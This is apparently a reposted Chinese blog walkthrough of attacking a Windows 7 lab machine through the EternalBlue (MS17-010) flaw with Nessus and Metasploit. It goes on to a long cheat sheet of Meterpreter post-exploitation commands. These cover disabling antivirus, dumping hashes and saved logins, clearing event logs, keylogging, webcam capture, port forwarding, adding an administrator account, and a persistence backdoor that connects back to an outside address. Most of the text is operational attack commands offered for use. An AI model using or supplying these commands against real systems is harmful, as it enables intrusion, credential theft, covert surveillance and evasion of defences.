永恒之蓝(MS17
环境部署
靶机:win7(172.168.100.158)
工具机:kali,nessus
攻击步骤
1、nessus扫描靶机
2、根据扫描结果查看靶机漏洞
3、发现靶机存在永恒之蓝(MS17-010)漏洞
4、打开工具机kali,打开MSF漏洞利用框架
5、搜索相关漏洞利用模块
5、利用MS17-010漏洞攻击模块进行攻击
(1)use调用攻击模块
(2)options查看需要进行的设置
(3)set命令设置rhost(目标主机)
(4)run(exploit)进行攻击
6、攻击成功。获取权限
渗透常用命令
下面展示一些 msf及后渗透常用命令。
// 常用命令
chcp 65001 #shell 编码乱码
run post/windows/manage/migrate #自动进程迁移
run post/windows/gather/checkvm #查看目标主机是否运行在虚拟机上
run post/windows/manage/killav #关闭杀毒软件
run post/windows/manage/enable_rdp #开启远程桌面服务
run post/windows/manage/autoroute #查看路由信息
run post/windows/gather/enum_logged_on_users #列举当前登录的用户
run post/windows/gather/enum_applications #列举应用程序
run windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码
run windows/gather/smart_hashdump #dump出所有用户的hash
clearev #清除事件日志
sysinfo #查看目标主机系统信息
run scraper #查看目标主机详细信息
run hashdump #导出密码的哈希
load kiwi #加载
ps #查看目标主机进程信息
pwd #查看目标当前目录(windows)
getlwd #查看目标当前目录(Linux)
search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的文件
download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下
upload /root/test.txt d:\test #将/root/test.txt上传到目标机的 d:\test\ 目录下
getpid #查看当前Meterpreter Shell的进程
PIDmigrate 1384 #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime #查看主机运行时间
getuid #查看获取的当前权限
getsystem #提权
run killav #关闭杀毒软件
screenshot #截图
webcam_list #查看目标主机的摄像头
webcam_snap #拍照
webcam_stream #开视频
execute 参数 -f 可执行文件 #执行可执行程序
run getgui -u hack -p 123 #创建hack用户,密码为123
run getgui -e #开启远程桌面
keyscan_start #开启键盘记录功能
keyscan_dump #显示捕捉到的键盘记录信息
keyscan_stop #停止键盘记录功能
uictl disable keyboard #禁止目标使用键盘
uictl enable keyboard #允许目标使用键盘
uictl disable mouse #禁止目标使用鼠标
uictl enable mouse #允许目标使用鼠标
load #使用扩展库
run #使用扩展库
run persistence -X -i 5 -p 8888 -r 192.168.10.27 #反弹时间间隔是5s 会自动连接192.168.27的4444端口,缺点是容易被杀毒软件查杀
portfwd add -l 3389 -r 192.168.11.13 -p 3389 #将192.168.11.13的3389端口转发到本地的3389端口上,这里的192.168.11.13是获取权限的主机的ip地址
clearev #清除日志
命令示例
Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。
sysinfo #查看目标主机系统信息
run post/windows/gather/checkvm #查看目标主机是否运行在虚拟机上
run post/windows/manage/migrate #自动进程迁移
run post/windows/manage/killav #关闭杀毒软件,由于靶机未装杀毒软件。所以未发现进程
run post/windows/manage/enable_rdp #开启远程桌面服务
run post/windows/gather/enum_logged_on_users #列举当前登录的用户
run windows/gather/smart_hashdump #dump出所有用户的hash
获取权限后shell,输入shell发现乱码,这是编码问题
输入chcp 65001解决乱码问题
增加用户并提权
net user 用户名 密码 /add
net localgroup administrators test /add
查看ip,利用创建好的账号密码远程登陆
发布者:admin,转转请注明出处:http://www.yc00.com/news/1690282707a325846.html
评论列表(0条)